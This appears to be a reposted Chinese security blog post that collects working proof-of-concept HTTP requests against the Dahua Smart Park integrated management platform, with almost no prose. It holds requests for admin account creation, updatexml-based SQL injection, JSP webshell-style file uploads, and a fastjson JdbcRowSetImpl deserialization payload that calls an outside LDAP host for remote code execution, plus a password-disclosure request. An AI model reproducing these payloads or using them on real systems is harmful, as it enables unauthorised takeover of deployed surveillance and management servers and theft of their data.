POST /admin/user_save.action HTTP/1.1 Host: Accept-Encoding: gzip Content-Length: 914 Content-Type: multipart/form-data; boundary=----fxwrpqcy Cookie: JSESSIONID=65A8F19555DC1EFB09B5A8B4F0F6921C User-Agent: Go-http-client/1.1 ------fxwrpqcy Content-Disposition: form-data; name="userBean.userType" 0 ------fxwrpqcy Content-Disposition: form-data; name="userBean.ownerCode" 001 ------fxwrpqcy Content-Disposition: form-data; name="userBean.isReuse" 0 ------fxwrpqcy Content-Disposition: form-data; name="userBean.macStat" 0 ------fxwrpqcy Content-Disposition: form-data; name="userBean.roleIds" 1 ------fxwrpqcy Content-Disposition: form-data; name="userBean.loginName" luqaahkf ------fxwrpqcy Content-Disposition: form-data; name="displayedOrgName" luqaahkf ------fxwrpqcy Content-Disposition: form-data; name="userBean.loginPass" lhndpuxl ------fxwrpqcy Content-Disposition: form-data; name="checkPass" lhndpuxl ------fxwrpqcy Content-Disposition: form-data; name="userBean.groupId" 0 ------fxwrpqcy Content-Disposition: form-data; name="userBean.userName" luqaahkf ------fxwrpqcy--
POST /WPMS/login HTTP/1.1 Host: Accept-Encoding: gzip Content-Length: 271 Content-Type: application/json User-Agent: Go-http-client/1.1 {"loginName":"luqaahkf","loginPass":"IxID6I8gKNSkCgu5UMwfRAhZpyvKKzu9q+dUngiieHiCTA52x3/uNB17NmAOletbzTOT46fLE5AOOMqMaqdDLA5rcsB3/Gql1qYwbNWLB6orKWpWEr9asUeNi/3ccIb95NUAXS1yn0l3ks94jbGT/CYbNq+JiBAeYlwcfdrqYkM=","timestamp":"16853622671401904168273612873678126378126387"}
/admin/login_login.action?subSystemToken=87a629bc14298c1533d8b52dd63e87f7
/upload/axqvssmz.jsp
大华智慧园区综合管理平台 getFaceCapture SQL注入漏洞
/portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(123)),0x7e),1)--%22%7D/extend/%7B%7D
大华智慧园区综合管理平台 searchJson SQL 注入漏洞
GET
/portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:
%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(388609)),0x7e),1)--%22%7D/exten
d/%7B%7D HTTP/1.1
Host: 127.0.0.1:7443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,
like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip, deflate
Connection: close
大华智慧园区综合管理平台 video文件上传漏洞
POST /publishing/publishing/material/file/video HTTP/1.1
Host: 127.0.0.1:7443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,
like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 804
Content-Type: multipart/form-data; boundary=dd8f988919484abab3816881c55272a7
Accept-Encoding: gzip, deflate
Connection: close
--dd8f988919484abab3816881c55272a7
Content-Disposition: form-data; name="Filedata"; filename="0EaE10E7dF5F10C2.jsp" <% contentType="text/html; charset=GBK"%><%
import="java.math.BigInteger"%><% import="java.security.MessageDigest"%><%
MessageDigest md5 = null;md5 = MessageDigest.getInstance("MD5");String s = "123456";String
miyao = "";String jiamichuan = s + miyao;md5.update(jiamichuan.getBytes());String md5String = new BigInteger(1, md5.digest()).toString(16);out.println(md5String);new
java.io.File(application.getRealPath(request.getServletPath())).delete();%>
--dd8f988919484abab3816881c55272a7
Content-Disposition: form-data; name="poc" poc
--dd8f988919484abab3816881c55272a7
Content-Disposition: form-data; name="Submit"
submit
--dd8f988919484abab3816881c55272a7
大华智慧园区综合管理平台 devicePoint_addImgIco文件上传漏洞
POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1
Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.69
Host: xx.xx.xx.xx
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 243
Connection: close
--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
Content-Disposition: form-data; name="upload"; filename="1ndex.jsp"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary
123
--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT--
大华智慧园区综合管理平台 deleteFtp 接口远程命令执行漏洞
POST http://1.1.1.1/CardSolution/card/accessControl/swingCardRecord/deleteFtp HTTP/1.1
Host: 1.1.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like
Gecko) 5bGx5rW35LmL5YWz
Content-Length: 205
Content-Type: application/json
Accept-Encoding: gzip, deflate
Connection: close
{"ftpUrl":{"e":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"f":{"@typ
e":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://cves.io","autoCommit":true}}}
大华智慧园区综合管理平台任意密码读取漏洞
GET /admin/login_login.action
GET /admin/user_getUserInfoByUserName.action?userName=system
原文始发于微信公众号(左逆安全攻防):大华 智慧园区综合管理平台 user_save.action 任意文件上传漏洞
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论